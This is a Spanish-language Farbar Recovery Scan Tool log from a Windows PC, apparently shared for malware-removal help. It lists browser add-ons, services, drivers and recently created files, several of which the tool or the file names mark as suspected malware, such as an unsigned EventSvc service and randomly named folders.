HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://es.msn.com/?ocid=iehp
BHO: Content Blocker Plugin -> {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\x64\IEExt\ContentBlocker\ie_content_blocker_plugin.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
BHO: Virtual Keyboard Plugin -> {73455575-E40C-433C-9784-C78DC7761455} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\x64\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> E:\Archivos de Programa\jAVA-AC\bin\ssv.dll [2018-05-08] (Oracle America, Inc. -> Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
BHO: Safe Money Plugin -> {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\x64\IEExt\OnlineBanking\online_banking_bho.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> E:\Archivos de Programa\jAVA-AC\bin\jp2ssv.dll [2018-05-08] (Oracle America, Inc. -> Oracle Corporation)
BHO: URL Advisor Plugin -> {E33CF602-D945-461A-83F0-819F76A199F8} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\x64\IEExt\UrlAdvisor\klwtbbho.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
BHO-x32: Content Blocker Plugin -> {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\IEExt\ContentBlocker\ie_content_blocker_plugin.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
BHO-x32: Virtual Keyboard Plugin -> {73455575-E40C-433C-9784-C78DC7761455} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
BHO-x32: Aplicación auxiliar de inicio de sesión en la cuenta Microsoft -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll [2013-05-22] (EVERNOTE CORPORATION -> Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) [Archivo no firmado]
BHO-x32: Safe Money Plugin -> {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\IEExt\OnlineBanking\online_banking_bho.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
BHO-x32: URL Advisor Plugin -> {E33CF602-D945-461A-83F0-819F76A199F8} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\IEExt\UrlAdvisor\klwtbbho.dll [2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://fpdownload.adobe.com/pub/shockwave/cabs/flash/swflash.cab
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2013-02-26] (Skype Technologies SA -> Skype Technologies)
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2012-02-28] (Microsoft Windows -> Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2012-02-28] (Microsoft Windows -> Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2012-02-28] (Microsoft Windows -> Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2012-02-28] (Microsoft Windows -> Microsoft Corporation)
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe hxxp://www.qvo6.com/?utm_source=b&utm_medium=cor&from=cor&uid=SAMSUNGXHD103SJ_S246J90Z484516&ts=1372918643

FireFox:
========
FF DefaultProfile: 0uh69wgl.default-1567320513344
FF ProfilePath: C:\Users\MrEidrian\AppData\Roaming\Mozilla\Firefox\Profiles\0uh69wgl.default-1567320513344 [2020-01-17]
FF ProfilePath: C:\Users\MrEidrian\AppData\Roaming\Flickr\Flickr Uploadr\Profiles\4jx3zuz0.default [2013-06-24]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\[email protected]
FF Extension: (Kaspersky URL Advisor) - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\[email protected] [2013-12-17] [Heredado] [no firmado]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\[email protected]
FF Extension: (Virtual Keyboard) - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\[email protected] [2013-12-17] [Heredado] [no firmado]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\[email protected]
FF Extension: (Content Blocker) - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\[email protected] [2013-12-17] [Heredado] [no firmado]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\[email protected]
FF Extension: (Anti-Banner) - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\[email protected] [2013-12-17] [Heredado] [no firmado]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\[email protected]
FF Extension: (Safe Money) - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\FFExt\[email protected] [2013-12-17] [Heredado] [no firmado]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_32_0_0_238.dll [2019-08-14] (Adobe Inc. -> )
FF Plugin: @java.com/DTPlugin,version=11.171.2 -> E:\Archivos de Programa\jAVA-AC\bin\dtplugin\npDeployJava1.dll [2018-05-08] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.171.2 -> E:\Archivos de Programa\jAVA-AC\bin\plugin2\npjp2.dll [2018-05-08] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.20513.0\npctrl.dll [2013-05-13] (Microsoft Corporation ->  Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2012-09-20] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_238.dll [2019-08-14] (Adobe Inc. -> )
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1165635.dll [2012-07-05] (Adobe Systems, Inc.) [Archivo no firmado]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.20513.0\npctrl.dll [2013-05-13] (Microsoft Corporation ->  Microsoft Corporation)
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [2013-10-21] (Pando Networks, Inc. -> Pando Networks)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.35.422\npGoogleUpdate3.dll [2020-01-17] (Google LLC -> Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.35.422\npGoogleUpdate3.dll [2020-01-17] (Google LLC -> Google LLC)
FF Plugin-x32: @videolan.org/vlc,version=2.0.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.0.8 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2017-05-24] (VideoLAN -> VideoLAN)
FF Plugin-x32: @wacom.com/wacom-plugin,version=1.1.0.10 -> C:\Program Files (x86)\TabletPlugins\npwacom.dll [2011-04-20] (Wacom, Inc.) [Archivo no firmado]
FF Plugin-x32: @wacom.com/wtPlugin,version=2.0.0.1 -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2011-05-31] (Wacom) [Archivo no firmado]
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2012-09-20] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin HKU\S-1-5-21-3862230028-3041123482-801023079-1000: pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [2013-10-21] (Pando Networks, Inc. -> Pando Networks)
FF Plugin HKU\S-1-5-21-3862230028-3041123482-801023079-1000: wacom.com/WacomTabletPlugin -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2011-05-31] (Wacom) [Archivo no firmado]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\a.js [2020-01-17]

Chrome: 
=======
CHR Profile: C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\Default [2020-01-31]
CHR Extension: (Presentaciones) - C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-09-01]
CHR Extension: (Application Launcher for Drive (by Google)) - C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\Default\Extensions\lmjegmlicamnimmfhcmpkclmigmmcbeh [2019-09-01]
CHR Extension: (book_helper) - C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\Default\Extensions\mihbhonnpblfklefmifmdampkldmloog [2019-09-01]
CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-01-17]
CHR Extension: (Chrome Media Router) - C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-09-01]
CHR HKU\S-1-5-21-3862230028-3041123482-801023079-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\Users\MREIDR~1\AppData\Local\Google\Drive\user_default\apdfllckaahabafndbhieahigkjlhalf_live.crx [2019-01-26]
CHR HKU\S-1-5-21-3862230028-3041123482-801023079-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh]
CHR HKU\S-1-5-21-3862230028-3041123482-801023079-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [npiecjlhkngdinoeekmccdbjdgclmnbk] - C:\Users\MrEidrian\AppData\Local\CRE\npiecjlhkngdinoeekmccdbjdgclmnbk.crx <no encontrado>

Opera: 
=======
OPR DownloadDir: E:\Descargas
OPR Extension: (book_helper) - C:\Users\MrEidrian\AppData\Roaming\Opera Software\Opera Stable\Extensions\mihbhonnpblfklefmifmdampkldmloog [2019-09-01]
OPR Extension: (FVD Video Downloader) - C:\Users\MrEidrian\AppData\Roaming\Opera Software\Opera Stable\Extensions\neacgcjokggofibnbfapeaejhclmpple [2019-09-01]
OPR Extension: (SaveFrom.net helper) - C:\Users\MrEidrian\AppData\Roaming\Opera Software\Opera Stable\Extensions\npdpplbicnmpoigidfdjadamgfkilaak [2019-09-01]

==================== Servicios (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

R2 AMD External Events Utility; C:\Windows\system32\atiesrxx.exe [239616 2013-08-30] (Microsoft Windows Hardware Compatibility Publisher -> AMD)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [96056 2019-04-29] (Apple Inc. -> Apple Inc.)
S3 AVP; C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\avp.exe [356128 2013-10-09] (Kaspersky Lab -> Kaspersky Lab ZAO)
R2 EsgShKernel; C:\Program Files\EnigmaSoft\SpyHunter\ShKernel.exe [11457840 2019-09-14] (EnigmaSoft Limited -> EnigmaSoft Limited)
R2 EventSvc; C:\ProgramData\EventSvc\eventsvc.exe [360448 2018-07-24] (CloudBees, Inc.) [Archivo no firmado] <==== ATENCIÓN
R2 gupdate; C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [360448 2020-01-17] (CloudBees, Inc.) [Archivo no firmado]
S3 gupdatem; C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [360448 2020-01-17] (CloudBees, Inc.) [Archivo no firmado]
R2 HuaweiHiSuiteService64.exe; C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe [190784 2018-12-12] (Huawei Technologies Co., Ltd. -> ) [Archivo no firmado]
S2 Main Service; C:\Program Files (x86)\MachinerData\ModularInstaller.exe [3076373 2020-01-17] (qweasdsadsad) [Archivo no firmado]
R2 NitroDriverReadSpool11; E:\Pro11\NitroPDFDriverService11x64.exe [327368 2016-12-08] (Nitro Software, Inc. -> Nitro Software, Inc.)
R2 NitroUpdateService; E:\Pro11\Nitro_UpdateService.exe [419016 2016-12-08] (Nitro Software, Inc. -> )
R2 nlsX86cc; C:\Windows\SysWOW64\nlssrv32.exe [71880 2016-12-08] (Nitro Software, Inc. -> Nalpeiron Ltd.)
R3 NMIndexingService; C:\Program Files (x86)\Common Files\Ahead\Lib\NMIndexingService.exe [279848 2007-06-27] (Nero AG -> Nero AG)
R2 NMSAccess64; C:\Windows\SysWOW64\NMSAccess64.exe [82872 2009-01-12] (Numedia Soft, Inc. -> )
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2012-09-04] (Even Balance, Inc. -> )
R2 ShMonitor; C:\Program Files\EnigmaSoft\SpyHunter\ShMonitor.exe [512816 2019-09-14] (EnigmaSoft Limited -> EnigmaSoft Limited)
S2 SkypeUpdate; E:\Archivos de Programa\Skype\Updater\Updater.exe [172192 2013-10-23] (Skype Software Sarl -> Skype Technologies)
R2 ss_conn_service; C:\Program Files\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe [754784 2016-01-08] (Samsung Electronics CO., LTD. -> DEVGURU Co., LTD.)
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Test Signing Certificate -> Adobe Systems Incorporated) [Archivo no firmado]
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [11446104 2019-04-24] (TeamViewer GmbH -> TeamViewer GmbH)
R2 TrustedLogos; C:\Windows\trustedlogos\TrustedLogos.exe [11328 2019-09-19] (Gelbe vom Ei GmbH -> )
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
R2 Windows Indexer; C:\Windows\SearchIndexer.exe [64512 2017-10-13] () [Archivo no firmado]
R2 wlidsvc; C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE [2292480 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)

===================== Controladores (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

R1 ab6af3c5e932269c; C:\Windows\system32\drivers\ab6af3c5e932269c.sys [33984 2019-09-01] (BlockChain Advances Ltd -> FsFilter Network)
R3 amdkmdag; C:\Windows\System32\DRIVERS\atikmdag.sys [12528640 2013-08-31] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices, Inc.)
R3 amdkmdap; C:\Windows\System32\DRIVERS\atikmpag.sys [618496 2013-08-30] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices, Inc.)
S3 androidusb; C:\Windows\System32\Drivers\androidusb.sys [32768 2010-04-29] (Microsoft Windows Hardware Compatibility Publisher -> Google Inc)
R3 AtiHDAudioService; C:\Windows\System32\drivers\AtihdW76.sys [96256 2013-07-05] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices)
S3 dg_ssudbus; C:\Windows\System32\DRIVERS\ssudbus.sys [131984 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283200 2012-09-01] (DT Soft Ltd -> DT Soft Ltd)
R3 EnigmaFileMonDriver; C:\Windows\System32\drivers\EnigmaFileMonDriver.sys [68424 2020-01-31] (EnigmaSoft Limited -> EnigmaSoft Limited)
S3 ew_usbccgpfilter; C:\Windows\System32\DRIVERS\ew_usbccgpfilter.sys [18944 2018-12-12] (Microsoft Windows Hardware Compatibility Publisher -> Huawei Technologies Co., Ltd.)
U5 hw_usbdev; C:\Windows\System32\Drivers\hw_usbdev.sys [116864 2018-12-12] (Microsoft Windows Hardware Compatibility Publisher -> Huawei Technologies Co., Ltd.)
R1 ISODrive; E:\Archivos de Programa\UltraISO\drivers\ISODrv64.sys [115600 2010-01-29] (SHENZHEN YIBO DIGITAL SYSTEMS DEVELOPMENT CO. LTD. -> EZB Systems, Inc.)
R0 kl1; C:\Windows\System32\DRIVERS\kl1.sys [458336 2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
U5 klflt; C:\Windows\System32\Drivers\klflt.sys [90208 2013-04-25] (Kaspersky Lab -> Kaspersky Lab ZAO)
R1 KLIF; C:\Windows\System32\DRIVERS\klif.sys [626272 2013-10-09] (Kaspersky Lab -> Kaspersky Lab ZAO)
R1 KLIM6; C:\Windows\System32\DRIVERS\klim6.sys [29792 2013-12-17] (Kaspersky Lab -> Kaspersky Lab ZAO)
R3 klkbdflt; C:\Windows\System32\DRIVERS\klkbdflt.sys [29280 2013-10-09] (Kaspersky Lab -> Kaspersky Lab ZAO)
R3 klmouflt; C:\Windows\System32\DRIVERS\klmouflt.sys [29280 2013-10-09] (Kaspersky Lab -> Kaspersky Lab ZAO)
R1 kltdi; C:\Windows\System32\DRIVERS\kltdi.sys [54368 2013-06-19] (Kaspersky Lab -> Kaspersky Lab ZAO)
R1 kneps; C:\Windows\System32\DRIVERS\kneps.sys [178448 2013-04-25] (Kaspersky Lab -> Kaspersky Lab ZAO)
R3 LGSHidFilt; C:\Windows\System32\DRIVERS\LGSHidFilt.Sys [66800 2013-01-17] (Logitech -> Logitech Inc.)
R3 nusb3hub; C:\Windows\System32\DRIVERS\nusb3hub.sys [96768 2011-10-25] (Microsoft Windows Hardware Compatibility Publisher -> Renesas Electronics Corporation)
R3 nusb3xhc; C:\Windows\System32\DRIVERS\nusb3xhc.sys [213504 2011-10-25] (Microsoft Windows Hardware Compatibility Publisher -> Renesas Electronics Corporation)
R3 RTL8167; C:\Windows\System32\DRIVERS\Rt64win7.sys [187392 2009-03-01] (Microsoft Windows Hardware Compatibility Publisher -> Realtek Corporation )
S3 ssudmdm; C:\Windows\System32\DRIVERS\ssudmdm.sys [166288 2017-05-18] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2017-11-27] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)
S3 usbser; C:\Windows\System32\DRIVERS\USBSER.sys [33280 2018-12-12] (Microsoft Corporation) [Archivo no firmado]
S3 wacmoumonitor; C:\Windows\System32\DRIVERS\wacmoumonitor.sys [13312 2011-09-08] (Microsoft Windows Hardware Compatibility Publisher -> Wacom Technology)

==================== NetSvcs (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)


==================== Un mes (creado) ===================

(Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.)

2020-01-31 11:11 - 2020-01-31 11:11 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
2020-01-31 11:11 - 2020-01-31 11:11 - 000440120 _____ (Microsoft Corporation) C:\ProgramData\msvcp140.dll
2020-01-31 11:11 - 2020-01-31 11:11 - 000334288 _____ (Mozilla Foundation) C:\ProgramData\freebl3.dll
2020-01-31 11:11 - 2020-01-31 11:11 - 000144848 _____ (Mozilla Foundation) C:\ProgramData\softokn3.dll
2020-01-31 11:11 - 2020-01-31 11:11 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
2020-01-31 11:11 - 2020-01-31 11:11 - 000083784 _____ (Microsoft Corporation) C:\ProgramData\vcruntime140.dll
2020-01-31 11:11 - 2020-01-31 11:11 - 000000000 ____D C:\ProgramData\S536BIPQ4TQ114GHW03YTCXG2
2020-01-31 11:10 - 2020-01-31 11:10 - 003061248 _____ C:\Users\MrEidrian\AppData\LocalLow\ELQnRq0YvJ.exe
2020-01-31 11:10 - 2020-01-31 11:10 - 000000000 ____D C:\Users\MrEidrian\Desktop\antes
2020-01-31 11:10 - 2020-01-31 11:10 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\vntlutefrev
2020-01-31 11:10 - 2020-01-31 11:10 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\vfbtqr24hkh
2020-01-31 11:10 - 2020-01-31 11:10 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\SolwaySoftware
2020-01-31 11:10 - 2020-01-31 11:10 - 000000000 ____D C:\Users\MrEidrian\AppData\LocalLow\AdLibs
2020-01-31 11:10 - 2020-01-31 11:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TVRadio
2020-01-31 11:10 - 2020-01-31 11:10 - 000000000 ____D C:\Program Files\NJ4SOTTRZH
2020-01-31 11:10 - 2020-01-31 11:10 - 000000000 ____D C:\Program Files\AUXDGUNQ0L
2020-01-31 11:10 - 2020-01-31 11:10 - 000000000 ____D C:\Program Files (x86)\TVRadio
2020-01-31 11:10 - 2020-01-31 11:10 - 000000000 ____D C:\Program Files (x86)\oberonapps
2020-01-17 12:07 - 2020-01-17 12:07 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\x4sjscyv4hq
2020-01-17 12:07 - 2020-01-17 12:07 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\uhnrjry4bdn
2020-01-17 12:07 - 2020-01-17 12:07 - 000000000 ____D C:\Program Files\U5EES31B4Q
2020-01-17 12:07 - 2020-01-17 12:07 - 000000000 ____D C:\Program Files\85E8BNNBEE
2020-01-17 12:02 - 2020-01-17 12:02 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\4plii4obowa
2020-01-17 12:02 - 2020-01-17 12:02 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\2j3xhwl5gqf
2020-01-17 12:02 - 2020-01-17 12:02 - 000000000 ____D C:\Program Files\ZWD63K22V7
2020-01-17 12:02 - 2020-01-17 12:02 - 000000000 ____D C:\Program Files\NPUOW5G9P5
2020-01-17 11:57 - 2020-01-17 11:57 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\mprw3ktcc2k
2020-01-17 11:57 - 2020-01-17 11:57 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\hi4mbly3ii3
2020-01-17 11:57 - 2020-01-17 11:57 - 000000000 ____D C:\Program Files\U24HP4O5BP
2020-01-17 11:57 - 2020-01-17 11:57 - 000000000 ____D C:\Program Files\ERTC7W5OYX
2020-01-17 11:53 - 2020-01-31 11:11 - 000000000 ____D C:\Users\MrEidrian\AppData\Local\GoogleChromeUserData
2020-01-17 11:52 - 2020-01-17 11:52 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\kdua1jfo123
2020-01-17 11:52 - 2020-01-17 11:52 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\g2dncbivjiz
2020-01-17 11:52 - 2020-01-17 11:52 - 000000000 ____D C:\Program Files\9B24IF9AQM
2020-01-17 11:52 - 2020-01-17 11:52 - 000000000 ____D C:\Program Files\6S3KYHHWIU
2020-01-17 11:46 - 2020-01-17 11:53 - 000000000 ____D C:\Users\MrEidrian\AppData\Local\GoogleChromeApplication
2020-01-17 11:45 - 2020-01-31 11:10 - 000000000 ____D C:\Users\MrEidrian\Desktop\FRST-OlderVersion
2020-01-17 11:43 - 2020-01-17 11:43 - 000000260 _____ C:\DelFix.txt
2020-01-17 11:43 - 2020-01-17 11:43 - 000000000 ____D C:\Windows\ERUNT
2020-01-17 11:41 - 2020-01-17 11:41 - 000000052 _____ C:\Users\MrEidrian\Desktop\asdf.txt
2020-01-17 11:40 - 2020-01-17 11:40 - 000797760 _____ C:\Users\MrEidrian\Desktop\delfix.exe
2020-01-17 11:40 - 2020-01-17 11:40 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\n0pczckdhog
2020-01-17 11:40 - 2020-01-17 11:40 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\a5cqdmrbe54
2020-01-17 11:40 - 2020-01-17 11:40 - 000000000 ____D C:\Program Files\YUGF9ZIQK7
2020-01-17 11:40 - 2020-01-17 11:40 - 000000000 ____D C:\Program Files\WAK3MKKWFC
2020-01-17 11:38 - 2020-01-17 12:05 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2020-01-17 11:35 - 2020-01-17 11:35 - 000000000 ____D C:\Program Files (x86)\MachinerData
2020-01-17 11:34 - 2020-01-31 11:07 - 000000000 ____D C:\Windows\trustedlogos
2020-01-17 11:34 - 2020-01-31 11:06 - 000000000 ____D C:\ProgramData\EventSvc
2020-01-17 11:34 - 2020-01-17 12:07 - 008021968 _____ (Password Kernel) C:\Users\MrEidrian\updata.exe
2020-01-17 11:34 - 2020-01-17 11:56 - 000000000 ____D C:\ProgramData\NtvHost
2020-01-17 11:34 - 2020-01-17 11:34 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2020-01-17 11:34 - 2020-01-17 11:34 - 000003510 _____ C:\Windows\system32\Tasks\ScheduledUpdate
2020-01-17 11:34 - 2020-01-17 11:34 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\VPNPR
2020-01-17 11:34 - 2020-01-17 11:34 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\frr3pwvyetd
2020-01-17 11:34 - 2020-01-17 11:34 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\dia1nwsj1y1
2020-01-17 11:34 - 2020-01-17 11:34 - 000000000 ____D C:\Users\MrEidrian\AppData\Local\AdvinstAnalytics
2020-01-17 11:34 - 2020-01-17 11:34 - 000000000 ____D C:\Program Files\KHJ98BRLDV
2020-01-17 11:34 - 2020-01-17 11:34 - 000000000 ____D C:\Program Files\0OP808P0KJ
2020-01-17 11:34 - 2020-01-17 11:34 - 000000000 ____D C:\Program Files (x86)\Innovative Solutions

==================== Un mes (modificado) ==================

(Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.)

2020-01-31 11:11 - 2019-10-18 11:01 - 000045541 _____ C:\Users\MrEidrian\Desktop\FRST.txt
2020-01-31 11:11 - 2019-09-13 19:13 - 000000000 ____D C:\FRST
2020-01-31 11:11 - 2011-01-22 11:38 - 000723256 _____ C:\Windows\system32\perfh00A.dat
2020-01-31 11:11 - 2011-01-22 11:38 - 000149330 _____ C:\Windows\system32\perfc00A.dat
2020-01-31 11:11 - 2009-07-14 06:13 - 001613422 _____ C:\Windows\system32\PerfStringBackup.INI
